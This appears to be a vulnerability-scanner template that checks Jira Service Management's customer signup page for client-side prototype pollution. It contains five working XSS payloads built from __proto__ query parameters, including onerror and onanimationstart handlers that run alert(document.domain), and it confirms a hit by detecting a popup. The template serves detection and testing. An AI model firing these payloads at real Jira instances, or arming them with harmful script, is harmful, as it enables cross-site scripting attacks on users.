id: jira-service-management-prototype-pollution
single: true
info:
  name: Jira Service Management Prototype Pollution
  risk: Medium

params:
  - root: '{{.BaseURL}}'

replicate:
  prefixes: 'jira'

variables:
  - endpoint: |
      /servicedesk/customer/user/signup?__proto__.div=1&__proto__.div=%3Cimg%20src%20onerror=alert(document.domain)%3E&__proto__.div=1
      /servicedesk/customer/user/signup?__proto__.preventDefault.__proto__.handleObj.__proto__.delegateTarget=%3Cimg/src/onerror=alert(1)%3E
      /servicedesk/customer/user/signup?__proto__.div=1&__proto__.div=<img%20src%20onerror=alert(1)>&__proto__.div=<img%20src%20onerror=alert(document.domain)>&__proto__.isFresh=xxx
      /servicedesk/customer/user/signup?__proto__.isFresh=xxx&__proto__.style=animation-name:spinnerRotateAnimation;//&__proto__.style=&__proto__.onanimationstart=alert(document.domain)//&__proto__.onanimationstart=
      /servicedesk/customer/user/signup?__proto__.js.main=data:,alert(document.domain)

requests:
  - method: GET
    redirect: true
    url: >-
     {{.root}}/servicedesk/customer/user/signup
    conclusions:
      - SetValue("isServicedesk", StatusCode() == 200 && StringSearch("response", "Service Desk") && StringSearch("response", "jira."))

  # only do confirmed if this is servicedesk
  - conditions:
      - ValueOf("isServicedesk") == "true"
    method: GET
    engine: chrome
    url: >-
      {{.root}}{{.endpoint}}
    headers:
      - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
    detections:
      - >-
        HasPopUp()

references:
  - link: 'https://blog.s1r1us.ninja/research/PP'
